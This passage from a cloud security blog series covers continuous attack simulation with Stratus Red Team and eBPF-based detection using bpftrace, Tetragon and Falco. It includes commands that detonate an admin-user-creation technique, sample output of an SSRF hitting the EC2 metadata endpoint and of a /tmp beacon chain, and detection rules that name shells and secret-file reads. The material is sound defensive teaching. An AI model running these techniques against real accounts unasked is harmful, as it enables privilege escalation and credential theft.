Key Takeaways

A cloud incident response playbook only works if it has been rehearsed before the incident. The Change Healthcare attack showed that nine days of undetected dwell time transforms a credential theft into a national healthcare disruption
Preserve before you contain: snapshot volumes and export logs before revoking credentials or isolating instances — forensic evidence destroyed during hasty containment cannot be reconstructed
The contain-vs-evidence tension is real and has to be resolved deliberately: isolated EC2 instances remain available for forensic access via the IR bastion; terminated instances do not
CloudTrail data events (S3 GetObject, Lambda invocations) are not enabled by default — if you need them during an incident and haven’t pre-enabled them, your data access scope is unknown
Recovery sequence is dev → staging → prod, and you verify detection fires in dev before promoting — if you can’t reproduce the detection that caught the original incident, you don’t know if it still works

What’s Next

This playbook is reactive. You run it after something goes wrong. EP13 is about making it proactive — running structured attack simulations against your own infrastructure on a regular cadence so the first time your team works through this sequence is not during an actual breach. Continuous purple team testing means your IR team has muscle memory for the playbook, your detection tooling is validated against real attack patterns, and your blast radius assumptions are tested before an attacker tests them for you.


Continuous Security Validation: Proving Your Architecture Works

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 5 minutes

Zero to Hero: Cybersecurity Architecture Masterclass, Module 6

TL;DR

Continuous security validation means running real attack techniques against your own production-equivalent environment on a schedule, not once a year during a pentest
stratus-red-team and Atomic Red Team execute specific, mapped MITRE ATT&CK techniques against live cloud infrastructure — the same IMDSv1 exploitation, IAM privilege escalation, and lateral-movement patterns covered earlier in this masterclass, but automated and repeatable
A validation run that never finds anything is either proof your controls work, or proof the simulation isn’t realistic enough — treat a clean run as a question, not a victory
Security culture is what determines whether a finding becomes a fixed control or a Jira ticket that ages out — validation without organizational follow-through is theater
The Feedback Loop closes the masterclass: every module (STRIDE, IAM hardening, immutable data, AI triage) becomes a control that continuous validation actually tests, instead of a design decision nobody revisits
This module doesn’t introduce new architecture — it’s the mechanism that proves Modules 1 through 5 are still true

Start Here: Run a Real Attack Technique Right Now

# Install Stratus Red Team (cloud-native attack technique simulator)
$ brew tap "datadog/stratus-red-team" "https://github.com/DataDog/stratus-red-team"
$ brew install datadog/stratus-red-team/stratus-red-team

# List available techniques mapped to MITRE ATT&CK
# (only the technique IDs are shown here; the real output is a wider table)
$ stratus list --platform aws | grep -i iam
aws.persistence.iam-create-admin-user
aws.persistence.iam-create-user-login-profile

# Warm up (provisions any prerequisite resources the technique needs),
# detonate the technique, then clean up
$ stratus warmup aws.persistence.iam-create-admin-user
$ stratus detonate aws.persistence.iam-create-admin-user
$ stratus cleanup aws.persistence.iam-create-admin-user

The detonate command actually creates an admin IAM user the way an attacker would after a privilege-escalation exploit: against your own account, on a schedule you control, so your detection pipeline either catches it or you now know precisely where the gap is. This is continuous security validation: the difference between assuming GuardDuty would catch this and knowing it does, because you just watched it happen.

Why an Annual Pentest Isn’t Validation

A pentest is a snapshot, scoped to a window, executed by people who leave when the engagement ends. It tells you what was true for the systems in scope, on those specific days, against that specific team’s technique set. Everything this masterclass has covered — STRIDE-driven design changes (Module 2), IAM policy tightening (Module 3), WORM-locked backups (Module 4), AI-assisted triage (Module 5) — happens on a continuous basis, in a system that changes weekly. A control validated once in March and never tested again is a control you’re assuming still works in October.

Continuous security validation closes that gap by running the same specific techniques — not a generic scan, but named, MITRE ATT&CK-mapped attack behaviors — on a recurring schedule, against infrastructure that mirrors production. The goal isn’t finding something new every time. Most runs should find nothing, because most runs are re-confirming a control that was already fixed. That’s the point: continuous validation is regression testing for security posture.
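The regression-testing framing can be sketched in a few lines. This is a minimal illustration, assuming each run is stored as a mapping from technique ID to whether the expected alert was confirmed; the `find_regressions` name and the record shape are hypothetical, not part of Stratus Red Team or Atomic Red Team.

```python
def find_regressions(previous: dict[str, bool], current: dict[str, bool]) -> list[str]:
    """Return technique IDs that were detected in the previous run but not in the current one."""
    return sorted(
        technique
        for technique, was_detected in previous.items()
        # A technique missing from the current run counts as not detected.
        if was_detected and not current.get(technique, False)
    )


# Hypothetical results: True means the expected alert was confirmed for that technique.
last_run = {
    "aws.credential-access.ec2-get-password-data": True,
    "aws.persistence.iam-create-user-login-profile": True,
}
this_run = {
    "aws.credential-access.ec2-get-password-data": False,
    "aws.persistence.iam-create-user-login-profile": True,
}

print(find_regressions(last_run, this_run))
```

A non-empty list is the interesting result: a control that held last time and no longer does, which is exactly what a point-in-time pentest cannot show.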

Reading a Clean Run Correctly

A validation run that detonates a technique and reports no finding is not automatically good news. It’s one of two things, and the difference matters:

 CLEAN RUN — TWO POSSIBLE EXPLANATIONS
 ───────────────────────────────────────────────────
 1. The control genuinely works.
    → GuardDuty/Tetragon/SIEM correctly detected and
      the alert pipeline correctly routed it — verify
      the alert actually fired and reached someone,
      not just that the technique "should have" tripped it.

 2. The simulation didn't actually exercise the real path.
    → Wrong region, wrong IAM role scope, a technique
      that's stale against current cloud provider APIs,
      or detection logic that's technically present but
      misconfigured for this specific technique variant.

Treat every clean run as a question — did the alert fire and get seen, or did nothing happen because nothing was really tested? Pulling the actual GuardDuty/SIEM record for the detonation timestamp and confirming a real alert exists, with the right severity, routed to the right channel, is the only way to tell these two outcomes apart. A validation program that only checks “did an incident occur” without checking “did the alert actually work” is measuring the wrong thing.
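One way to make that check mechanical is sketched below. It assumes you can export alerts as records with a rule name, a firing time, and a flag saying whether the alert reached a human channel; that record shape, the 15-minute window, and the `classify_run` name are all assumptions for illustration, not a GuardDuty or SIEM API.

```python
from datetime import datetime, timedelta


def classify_run(detonated_at, alerts, expected_rule, window=timedelta(minutes=15)):
    """Classify one detonation as 'confirmed', 'alert_not_routed', or 'unverified'.

    alerts: iterable of dicts with 'rule', 'fired_at' (datetime), and 'routed' (bool).
    """
    matching = [
        alert for alert in alerts
        if alert["rule"] == expected_rule
        and detonated_at <= alert["fired_at"] <= detonated_at + window
    ]
    if not matching:
        # No alert in the window: a detection gap, or the technique never really ran.
        return "unverified"
    if any(alert["routed"] for alert in matching):
        return "confirmed"
    # The detection fired, but nobody would have seen it.
    return "alert_not_routed"


detonated = datetime(2026, 7, 7, 10, 0, 0)
alerts = [
    {"rule": "iam-admin-user-created", "fired_at": detonated + timedelta(minutes=3), "routed": False},
]
print(classify_run(detonated, alerts, "iam-admin-user-created"))
```

Only `confirmed` counts as a control that works; the other two outcomes each need a human to look at the run.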

Mapping Continuous Security Validation Back to the Masterclass

Continuous validation is most useful when it directly re-tests the specific controls this series built, not a generic attack library run for its own sake:

Module	Control Being Tested	Example Validation Technique
M2 (STRIDE)	Trust boundary enforcement between services	Attempt lateral cross-service call that should be denied
M3 (Identity Perimeter)	IMDSv2 enforcement, IAM least privilege	`aws.persistence.iam-create-admin-user`, IMDSv1 credential theft simulation
M4 (Immutable Data)	Object Lock Compliance mode holds under attempted deletion	Attempt to delete/modify a WORM-locked backup object with admin credentials
M5 (AI Triage)	RAG pipeline correctly retrieves and cites relevant evidence for a simulated alert	Inject a known-pattern alert, verify the drafted summary cites the correct runbook

Running these specific, mapped checks on a schedule — weekly or per-deploy, not annually — is what separates continuous validation from a checklist audit. It’s also directly in the spirit of the attack-and-detect framing this site’s Purple Team series uses throughout: red team technique, blue team detection, purple team is the discipline of running both together on purpose.

The Part Tooling Can’t Fix: Security Culture

A validation run that surfaces a real gap and produces a Jira ticket that sits untouched for two quarters has not improved anything — it’s produced evidence of a known, unfixed gap, which is a worse position than not knowing. Continuous validation only works inside an organization where a finding routes to an owner, gets prioritized against other engineering work honestly (this is Module 2’s DREAD scoring, applied to validation findings instead of design-time threats), and gets re-tested after the fix ships to confirm it actually closed.
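As a rough illustration of ranking validation findings with DREAD, the sketch below assumes each of the five factors is scored from 1 to 10 and averaged. That is one common convention and may differ from the scale Module 2 uses; the `Finding` class, its fields, and the sample findings are hypothetical.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    title: str
    owner: str  # the specific team whose control failed
    damage: int
    reproducibility: int
    exploitability: int
    affected_users: int
    discoverability: int

    def dread_score(self) -> float:
        """Average of the five DREAD factors (assumed 1-10 scale)."""
        total = (self.damage + self.reproducibility + self.exploitability
                 + self.affected_users + self.discoverability)
        return total / 5


def prioritize(findings):
    """Return findings ordered from highest to lowest DREAD score."""
    return sorted(findings, key=lambda finding: finding.dread_score(), reverse=True)


findings = [
    Finding("Stale debug role still assumable", "platform-team", 3, 4, 2, 5, 1),
    Finding("Admin user creation raised no alert", "detection-team", 8, 9, 7, 6, 5),
]
for finding in prioritize(findings):
    print(f"{finding.dread_score():.1f}  {finding.owner}  {finding.title}")
```

Carrying an explicit `owner` on every finding keeps the score attached to a team that can act on it rather than to a shared backlog.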

The Feedback Loop that closes this masterclass is this: Threat Model (M2) → Harden (M3/M4) → Validate (M6) → feed validation findings back into the next threat model. A gap continuous validation finds isn’t just a bug to fix — it’s a signal that the original threat model missed something, and the next STRIDE pass on that system should account for it explicitly.

Production Gotchas

Running attack simulations against shared/production environments without coordination causes real incidents. Detonating iam-create-admin-user against a live account without warning your own SOC produces a real, confusing incident response — schedule and announce validation runs the same way you’d announce a game day exercise.

Cleanup failures leave real vulnerable resources behind. stratus cleanup can fail silently if a dependent resource was modified mid-run — verify cleanup completed, don’t assume the tool always tears down what it created.

Technique libraries go stale as cloud provider APIs change. A technique written against an older IAM API surface may silently fail to actually reproduce the attack path — validate that a “no alert” result means the control held, not that the technique itself broke.

Validation findings that don’t map to an owning team die in a backlog. Route every finding to the specific service/team whose control failed, the same way you’d route a production incident — a finding owned by “security team, generally” doesn’t get fixed.

Framework Alignment

Framework	Control / ID	Architectural Mapping
NIST CSF 2.0	ID.IM-02	Improvements are identified from security tests and exercises, including continuous validation.
NIST SP 800-207	Zero Trust	Continuous validation is the operational proof that “continuous verification” (Module 1) is actually happening, not just designed.
ISO 27001:2022	8.29	Security testing in development and acceptance — extended here to continuous, production-equivalent testing.
SOC 2	CC4.1	The entity selects, develops, and performs ongoing evaluations to ascertain whether controls are present and functioning.

Key Takeaways

Continuous security validation runs specific, MITRE ATT&CK-mapped techniques against your own infrastructure on a schedule — not a once-a-year pentest
A clean run is ambiguous by default — confirm the alert actually fired and routed correctly, don’t assume the absence of an incident means the control worked
Map validation techniques directly back to the specific controls this masterclass built, not a generic attack library
Security culture — findings that route to an owner and get re-tested after the fix — is what makes validation matter; tooling alone doesn’t
The Feedback Loop is the masterclass’s actual conclusion: threat model, harden, validate, and feed what you learn back into the next threat model

What’s Next

That closes the six-module arc: from dismantling the castle-and-moat (Module 1), through systematic threat modeling (Module 2), hardening the cloud identity perimeter (Module 3), surviving ransomware with immutable data (Module 4), accelerating detection with AI (Module 5), to proving all of it actually holds (Module 6). The loop doesn’t end here — every validation finding is the start of the next threat model.

Get new masterclass content and future modules in your inbox → linuxcent.com/subscribe

Detection Engineering with eBPF: Kernel-Level Visibility for Cloud Incidents

July 6, 2026 by Vamshi Krishna Santhapuri

Reading Time: 13 minutes

TL;DR

Detection engineering with eBPF addresses OWASP A09 directly: most process-level attack techniques leave no trace in CloudTrail, VPC Flow Logs, or syslog — eBPF hooks in the kernel observe them before the attacker has any ability to suppress the record
CloudTrail is API-plane only; VPC Flow Logs are network-plane only, typically queryable 10–15 minutes after the event once aggregation and delivery are counted, and carry no process context; syslog captures only what userspace processes voluntarily emit. All three miss the OS-level attack surface entirely
eBPF attaches to kernel syscall tracepoints and kprobes to capture connect(), execve(), mount(), setuid(), and open() with full context: PID, process name, container cgroup, parent process, timestamp — in real time
Falco and Tetragon are the production-grade always-on options; bpftrace is the ad-hoc investigation tool — use each for what it is designed for
Tetragon’s TracingPolicy can kill a process at the moment of the violating syscall, before the attack completes — this is enforcement, not just alerting
Every attack in EP07 through EP10 has a detectable kernel-level signal; this episode maps each one to a concrete eBPF detection rule

OWASP Mapping: A09 Security Logging and Monitoring Failures — the structural gap this series has referenced from EP04 onward: attacks that succeed not because defenses are absent, but because the telemetry layer cannot see the OS surface where the attacks execute.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                  DETECTION ENGINEERING WITH eBPF                        │
│                                                                         │
│   KERNEL SPACE                          USERSPACE                       │
│                                                                         │
│   syscall/kprobe hooks                                                  │
│   ┌──────────────────┐                                                  │
│   │ connect()        │──▶ ring buffer ──▶ Tetragon ──▶ Hubble/SIEM     │
│   │ execve()         │                                                  │
│   │ mount()          │──▶ ring buffer ──▶ Falco   ──▶ Slack/PagerDuty │
│   │ setuid()         │                                                  │
│   │ open()           │──▶ perf buffer ──▶ bpftrace ──▶ stdout/log     │
│   └──────────────────┘                                                  │
│          │                                                              │
│          │  Context captured at hook:                                   │
│          │  PID · comm · cgroup (container ID) · args · timestamp      │
│          │  parent PID · network namespace · mount namespace           │
│                                                                         │
│   ═══════════════════════════════════════════════════════════           │
│   WHAT OTHER TOOLS SEE                                                  │
│   CloudTrail:     API calls only — nothing below the AWS SDK            │
│   VPC Flow Logs:  src/dst IP+port only — 15-min delay, no PID          │
│   Syslog:         What the process chose to log — attacker controls it  │
│   eBPF:           Every syscall — attacker cannot suppress it          │
│                   without kernel access                                 │
└─────────────────────────────────────────────────────────────────────────┘

Detection engineering with eBPF closes the observability gap that every previous episode in this series exploited. The SSRF in EP07 made an outbound connection to 169.254.169.254 — the EC2 metadata endpoint — from a web application process. VPC Flow Logs show that IP eventually. CloudTrail shows nothing. eBPF shows the connect() syscall with the PID, the process name, the container cgroup ID, and the timestamp, in the sub-millisecond window it occurred.

The Problem: Your SIEM Has a 15-Minute Hole

During a cloud incident response engagement, the question came up in the first hour: did this process make any outbound connections in the last 30 minutes?

Four telemetry sources, four answers:

CloudTrail: Not applicable. CloudTrail records AWS API calls. A process inside an EC2 instance making a raw TCP connection to an external IP — or to the metadata endpoint — is OS-level activity. CloudTrail has no record of it.

VPC Flow Logs: Maybe, eventually. Flow Logs aggregate at 1-minute or 10-minute intervals (configurable), then land in S3 or CloudWatch Logs with additional delay. In practice, you’re looking at 10–15 minutes before the data is queryable. The flow record contains source IP, destination IP, source port, destination port, protocol, bytes, packets — and nothing else. There is no PID. There is no process name. There is no indication of which container inside the EC2 instance made the connection. If ten pods are running on the same node, VPC Flow Logs tells you the node talked to an external IP. You don’t know which pod.

Syslog: Nothing logged. The process — a compromised web application exploited via SSRF — didn’t log the connection. It wouldn’t. Application code doesn’t emit syslog entries for every outbound connection it makes. And an attacker controlling the process would not add logging.

eBPF (connect() tracepoint or tcp_connect kprobe): Every TCP connection attempt, from the moment the process issued it, with PID, process name, container cgroup ID, destination IP, destination port, source IP, and timestamp, streamed in real time rather than batched.

That is the gap. Everything in EP04 through EP10 of this series lived in it.

The OWASP A09 framing is exactly right: these are not failures of detection rules, they are failures of the telemetry layer. You cannot write a SIEM rule for data that is never collected. eBPF collects the data that the other layers structurally cannot.

What eBPF Detects That Other Tools Miss

Technique	CloudTrail	VPC Flow Logs	Syslog	eBPF
Process spawn inside container	No	No	Maybe (if auditd configured)	Yes — execve(): PID, command, args, parent PID, container cgroup
Outbound TCP connection	No	IP+port, 15-min delay, no PID	No	connect(): IP+port+PID+comm+container, real-time
File write to /etc/passwd	No	No	No	openat()+write(): exact path, PID, comm, container
Privilege escalation (setuid/setgid)	No	No	Maybe (auditd)	Yes — setuid() syscall args: target UID, calling PID, comm
Container escape attempt via mount	No	No	No	mount(): args, mount namespace ID, calling PID — namespace mismatch detectable
SSRF to 169.254.169.254	No	IP only, 15-min delay	No	connect() from app process to metadata IP — PID, comm, container, real-time
Binary execution with unusual parent	No	No	No	execve(): full parent chain — detects shell spawned from web process
Kubernetes secret file read	No	No	No	openat() on /run/secrets/kubernetes.io/serviceaccount/token
STS credential fetch from Lambda	No	Endpoint IP only	No	connect() to sts.amazonaws.com from unexpected process

The pattern across the table is consistent: CloudTrail covers the AWS control plane. VPC Flow Logs cover the network plane with delay and no process context. Syslog covers what processes choose to emit. eBPF covers the syscall surface — the layer where every one of these events must pass, regardless of what the attacker wants.

For operators not writing eBPF: This table tells you what your current SIEM can and cannot see. If your threat model includes container escapes, SSRF-to-metadata attacks, or post-compromise lateral movement through process execution, the detection signal for those techniques does not exist in your CloudTrail or your flow logs. It exists only at the kernel level.

Detection Rule 1: Unexpected Outbound from an Application Container

The SSRF attack in EP07 — and the lateral movement in EP10 — both required an outbound TCP connection from a process that had no legitimate reason to make one. This is the detection.

Ad-hoc investigation with bpftrace

When you’re on a node right now and need to know what’s connecting outbound:

# Shows PID, process name, and destination IP in real time
# Run on the node (requires root or CAP_BPF)
bpftrace -e '
#include <linux/socket.h>
#include <linux/in.h>

tracepoint:syscalls:sys_enter_connect {
  $sa = (struct sockaddr_in *)args->uservaddr;
  if ($sa->sin_family == AF_INET) {
    printf("connect: pid=%-6d comm=%-20s dst=%s:%d\n",
           pid,
           comm,
           ntop($sa->sin_addr.s_addr),
           (uint16)bswap($sa->sin_port));
  }
}
'

Sample output — what you’d see during an SSRF exploit targeting the EC2 metadata service:

connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18432  comm=curl                 dst=169.254.169.254:80

The python3 process, your web application, is connecting to 169.254.169.254, the metadata endpoint. That’s not a legitimate application dependency. That’s the SSRF signal.
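If you capture that bpftrace output to a file during an investigation, a short script can pull out the metadata-endpoint connections. This is a sketch that assumes the exact `printf` format used in the one-liner above; the `imds_connections` helper and the `allowed_comms` allowlist are hypothetical names for illustration.

```python
import re

IMDS_IP = "169.254.169.254"
# Matches lines such as: connect: pid=18422  comm=python3   dst=169.254.169.254:80
LINE_RE = re.compile(r"connect: pid=(\d+)\s+comm=(\S+)\s+dst=([\d.]+):(\d+)")


def imds_connections(lines, allowed_comms=frozenset()):
    """Return (pid, comm) for every connect to the metadata IP from a non-allowlisted process."""
    hits = []
    for line in lines:
        match = LINE_RE.search(line)
        if not match:
            continue  # skip bpftrace banners and unrelated output
        pid, comm, ip, _port = match.groups()
        if ip == IMDS_IP and comm not in allowed_comms:
            hits.append((int(pid), comm))
    return hits


captured = [
    "connect: pid=18422  comm=python3              dst=169.254.169.254:80",
    "connect: pid=18422  comm=python3              dst=169.254.169.254:80",
    "connect: pid=18432  comm=curl                 dst=169.254.169.254:80",
    "connect: pid=900    comm=sshd                 dst=10.0.0.5:22",
]
for pid, comm in imds_connections(captured):
    print(f"IMDS access: pid={pid} comm={comm}")
```

The allowlist exists because some node agents legitimately query the metadata service; an application process almost never should.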

The companion post "bpftrace — kernel answers in one line" goes deep on the tracepoint/kprobe model and how to filter by cgroup for container-specific traces. The one-liners above are the starting point; that post covers building targeted investigation scripts.

Production-grade enforcement with Tetragon

bpftrace is for investigation. Tetragon is for always-on detection — and optionally, prevention.

# TracingPolicy: alert on outbound connections from non-host network namespaces
# (any container making outbound TCP connections)
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-outbound-connections"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchNamespaces:
      - namespace: Net
        operator: NotIn
        values:
        - "host_ns"
      matchActions:
      - action: Post   # Generate an alert event; change to Sigkill to prevent

To detect specifically the SSRF-to-metadata pattern — connections to 169.254.169.254:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-imds-access"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "DAddr"          # match on the socket's destination address
        values:
        - "169.254.169.254/32"
      matchActions:
      - action: Post
        rateLimit: "1m"            # suppress repeats of the same event for one minute

Tetragon events include process_kprobe JSON with the pod name, namespace, container ID, binary path, parent binary, and all arguments. This feeds directly into your SIEM or to Hubble’s flow log.
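Before wiring those events into a SIEM, it can help to filter an exported event stream by hand. The sketch below assumes one JSON object per line and the field names `process_kprobe`, `function_name`, `args[].sock_arg.daddr`, `process.binary`, and `process.pod.name`; treat those paths as assumptions and confirm them against events from your own Tetragon version. The `imds_events` helper is hypothetical.

```python
import json


def imds_events(json_lines, imds_ip="169.254.169.254"):
    """Yield (pod, binary) for tcp_connect events whose destination is the metadata IP."""
    for raw in json_lines:
        if not raw.strip():
            continue  # tolerate blank lines in the export
        event = json.loads(raw).get("process_kprobe")
        if not event or event.get("function_name") != "tcp_connect":
            continue
        for arg in event.get("args", []):
            sock = arg.get("sock_arg")
            if sock and sock.get("daddr") == imds_ip:
                process = event.get("process", {})
                # Events from host processes carry no pod information.
                pod = process.get("pod", {}).get("name", "<host>")
                yield pod, process.get("binary", "<unknown>")


# Hand-written sample event, shaped after the assumed schema above.
sample = json.dumps({
    "process_kprobe": {
        "process": {"binary": "/usr/bin/python3", "pod": {"name": "web-1"}},
        "function_name": "tcp_connect",
        "args": [{"sock_arg": {"daddr": "169.254.169.254", "dport": 80}}],
    }
})
for pod, binary in imds_events([sample]):
    print(f"pod={pod} binary={binary}")
```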

Detection Rule 2: Process Execution Inside a Container

A shell spawning inside a container that has no business running a shell is a post-compromise indicator. It covers the container escape setup from EP08, the supply chain implant from EP09, and any hands-on-keyboard phase after initial access.

Falco rule: shell spawned from application container

# Falco rule: detect any shell spawned in a container
# Add to /etc/falco/rules.d/purple-team.yaml
- list: shell_binaries
  items: [bash, sh, zsh, ksh, fish, tcsh, csh, dash]

- list: allowed_shell_images
  items: [
    "debug-tools",     # Your approved debug container image names
    "toolbox"
  ]

- rule: Shell Spawned in Container
  desc: >
    A shell was spawned inside a container. In application containers (web servers,
    APIs, data processors) this is almost always a post-compromise indicator.
  condition: >
    evt.type = execve and
    evt.dir = < and
    container and
    container.image.repository != "" and
    proc.name in (shell_binaries) and
    not proc.pname in (shell_binaries) and
    not container.image.repository in (allowed_shell_images) and
    not k8s.ns.name in (kube-system, kube-public)
  output: >
    Shell spawned in container
    (user=%user.name
     container=%container.name
     image=%container.image.repository
     cmd=%proc.cmdline
     parent=%proc.pname
     pod=%k8s.pod.name
     ns=%k8s.ns.name)
  priority: WARNING
  tags: [purple-team, post-compromise, container]

The proc.pname condition is the key signal: a shell spawned by a web server process (nginx, node, gunicorn, java) is a different threat than a shell spawned by another shell in a debug context. The rule above lets the second case through via the "not proc.pname in (shell_binaries)" clause and flags the first; the allowed_shell_images list separately exempts your approved debug images.

Detecting the supply chain implant pattern

EP09 covered supply chain attacks where a build artifact executes unexpected binaries at runtime. The bpftrace version for ad-hoc investigation of what a specific container is executing:

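# bpftrace: trace execve() calls from processes inside a specific container
# First, find the container's cgroup path (the filter below needs cgroup v2):
# systemd-cgls | grep <pod-name>
# Or: cat /sys/fs/cgroup/unified/<cgroup-path>/cgroup.procs
# Then substitute that path in the cgroupid() filter; adjust the prefix
# if your cgroup v2 hierarchy is mounted directly at /sys/fs/cgroup.

bpftrace -e '
tracepoint:syscalls:sys_enter_execve
/cgroup == cgroupid("/sys/fs/cgroup/unified/<cgroup-path>")/
{
  printf("execve: pid=%-6d ppid=%-6d comm=%-20s file=%s\n",
         pid,
         curtask->real_parent->tgid,
         comm,
         str(args->filename));
}
' 2>/dev/null | grep -v "^\[" | head -50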

Sample output during a supply chain compromise scenario — unexpected binary execution from a package manager implant:

execve: pid=31204  ppid=31190  comm=node                 file=/bin/sh
execve: pid=31205  ppid=31204  comm=sh                   file=/tmp/.x/beacon
execve: pid=31206  ppid=31205  comm=beacon               file=/usr/bin/curl

The chain node → sh → /tmp/.x/beacon → curl — application process spawning a shell, which executes an unknown binary from /tmp, which runs curl — is the supply chain implant execution pattern. None of this appears in CloudTrail.
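The same chain can be reconstructed from captured output. This sketch assumes the `printf` format of the execve one-liner above and treats `/tmp/`, `/var/tmp/`, and `/dev/shm/` as suspicious locations, which is an illustrative choice rather than a complete list; `suspicious_chains` is a hypothetical helper.

```python
import re

EXEC_RE = re.compile(r"execve: pid=(\d+)\s+ppid=(\d+)\s+comm=(\S+)\s+file=(\S+)")
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def suspicious_chains(lines):
    """Return execution chains that end in a binary run from a world-writable directory."""
    events = {}  # pid -> (ppid, comm of the caller, path being executed)
    for line in lines:
        match = EXEC_RE.search(line)
        if match:
            pid, ppid, comm, path = match.groups()
            # A later execve by the same pid overwrites the earlier record.
            events[int(pid)] = (int(ppid), comm, path)

    chains = []
    for ppid, comm, path in events.values():
        if not path.startswith(SUSPICIOUS_DIRS):
            continue
        chain = [path]
        seen = set()
        # Walk up through every parent whose own execve was also captured.
        while ppid in events and ppid not in seen:
            seen.add(ppid)
            ppid, comm, parent_path = events[ppid]
            chain.append(parent_path)
        chain.append(comm)  # name of the oldest process seen calling execve
        chains.append(list(reversed(chain)))
    return chains


captured = [
    "execve: pid=31204  ppid=31190  comm=node                 file=/bin/sh",
    "execve: pid=31205  ppid=31204  comm=sh                   file=/tmp/.x/beacon",
    "execve: pid=31206  ppid=31205  comm=beacon               file=/usr/bin/curl",
]
for chain in suspicious_chains(captured):
    print(" -> ".join(chain))
```

Matching on the whole chain rather than on a single execve is what separates an implant from, say, a build step that legitimately unpacks into /tmp.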

Detection Rule 3: Privilege Escalation — setuid(0) and Capability Abuse

A process calling setuid(0) to elevate to root, or setcap to acquire new capabilities, is a privilege escalation indicator. The EP08 container escape path used a setuid binary to gain root inside the container as the first step toward escaping the namespace.

bpftrace: catch setuid(0) calls in real time

# bpftrace: alert on any process calling setuid(0)
# Any process attempting to switch to UID 0
bpftrace -e '
tracepoint:syscalls:sys_enter_setuid {
  if (args->uid == 0) {
    printf("ALERT setuid(0): pid=%-6d comm=%-20s ppid=%d pcomm=%s\n",
           pid,
           comm,
           curtask->real_parent->tgid,
           str(curtask->real_parent->comm));
  }
}
tracepoint:syscalls:sys_enter_setresuid {
  if (args->ruid == 0 || args->euid == 0) {
    printf("ALERT setresuid(root): pid=%-6d comm=%-20s\n", pid, comm);
  }
}
'

Falco rule: setuid binary execution inside container

- rule: Setuid Binary Executed in Container
  desc: >
    A setuid binary was executed inside a container. Setuid binaries inside
    containers are a privilege escalation path — they run as root regardless
    of the container's user setting.
  condition: >
    evt.type = execve and
    evt.dir = < and
    container and
    proc.is_suid_exe = true
  output: >
    Setuid binary executed in container
    (binary=%proc.exepath
     user=%user.name
     container=%container.name
     pod=%k8s.pod.name
     cmd=%proc.cmdline)
  priority: ERROR
  tags: [purple-team, privilege-escalation, container]

Detection Rule 4: Container Escape Attempt via Namespace-Crossing Mount

The privileged container escape path from EP08 requires calling mount() from a container namespace to access the host filesystem. The kernel records the mount namespace of the calling process — an eBPF kprobe on mount() can detect when the caller’s mount namespace differs from the host namespace.

Tetragon policy: kill any mount from a non-host namespace

# This covers the --privileged container escape path documented in EP08
# The mount() call that crosses from container namespace to host filesystem
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-container-mount-escape"
spec:
  kprobes:
  - call: "security_sb_mount"
    syscall: false
    args:
    - index: 0
      type: "string"     # dev_name
    - index: 3
      type: "uint64"     # mount flags (unsigned long)
    selectors:
    - matchNamespaces:
      - namespace: Mnt
        operator: NotIn
        values:
        - "host_ns"
      matchArgs:
      - index: 0
        operator: "NotEqual"
        values:
        - "proc"
        - "sysfs"
        - "tmpfs"        # Common legitimate mounts in containers
      matchActions:
      - action: Sigkill

Start with action: Post and tune the exclusions for your environment before switching to Sigkill. See the production gotchas below.

bpftrace: ad-hoc namespace crossing investigation

# bpftrace: trace mount() calls and show the mount namespace of the caller
# Mount namespace ID of the host: read from /proc/1/ns/mnt
HOST_MNT_NS=$(readlink /proc/1/ns/mnt | grep -oP '\d+')
echo "host mnt_ns=${HOST_MNT_NS}"   # print it so it can be compared with the trace

bpftrace -e '
#include <linux/nsproxy.h>
#include <linux/mount.h>

// The syscall tracepoint is architecture-independent, unlike kprobe:__x64_sys_mount
tracepoint:syscalls:sys_enter_mount {
  $nsproxy = (struct nsproxy *)curtask->nsproxy;
  $mnt_ns_id = $nsproxy->mnt_ns->ns.inum;
  printf("mount: pid=%-6d comm=%-20s mnt_ns=%u\n",
         pid, comm, $mnt_ns_id);
}
' 2>/dev/null

Compare the mnt_ns value in output against $HOST_MNT_NS. Any mount call with a mnt_ns value other than the host’s is from inside a container. A privileged container attempting host filesystem access shows a container namespace ID.
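That comparison is easy to script against captured output. The sketch below assumes the `printf` format of the mount one-liner above and that it runs on the node itself, so `/proc/1/ns/mnt` refers to the host; `host_mnt_ns` and `non_host_mounts` are hypothetical helper names.

```python
import os
import re

MOUNT_RE = re.compile(r"mount: pid=(\d+)\s+comm=(\S+)\s+mnt_ns=(\d+)")


def host_mnt_ns(link_target=None):
    """Return the host mount namespace inode from a link target like 'mnt:[4026531841]'."""
    if link_target is None:
        # Must run on the node; inside a container PID 1 is not the host init.
        link_target = os.readlink("/proc/1/ns/mnt")
    return int(re.search(r"\d+", link_target).group())


def non_host_mounts(lines, host_ns):
    """Return (pid, comm, mnt_ns) for every mount() made outside the host mount namespace."""
    results = []
    for line in lines:
        match = MOUNT_RE.search(line)
        if match and int(match.group(3)) != host_ns:
            results.append((int(match.group(1)), match.group(2), int(match.group(3))))
    return results


# Hypothetical captured lines; the namespace IDs are made up for the example.
captured = [
    "mount: pid=1201   comm=systemd              mnt_ns=4026531841",
    "mount: pid=45110  comm=sh                   mnt_ns=4026532770",
]
host_ns = host_mnt_ns("mnt:[4026531841]")
for pid, comm, ns in non_host_mounts(captured, host_ns):
    print(f"non-host mount: pid={pid} comm={comm} mnt_ns={ns}")
```

A non-host namespace ID is a lead, not a verdict: some host services also run in private mount namespaces, so check which workload owns the PID before escalating.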

Building a Detection Pipeline

Ad-hoc bpftrace commands answer questions during an incident. Always-on detection requires a pipeline that runs continuously, routes alerts to a durable destination, and survives pod restarts. The two production-grade options in this stack:

eBPF hooks
    │
    ├── Tetragon (always-on, Kubernetes-native)
    │       └── TracingPolicy CRDs
    │               └── JSON events → Hubble → Grafana
    │                               → SIEM (Splunk/Elastic)
    │                               → PagerDuty
    │
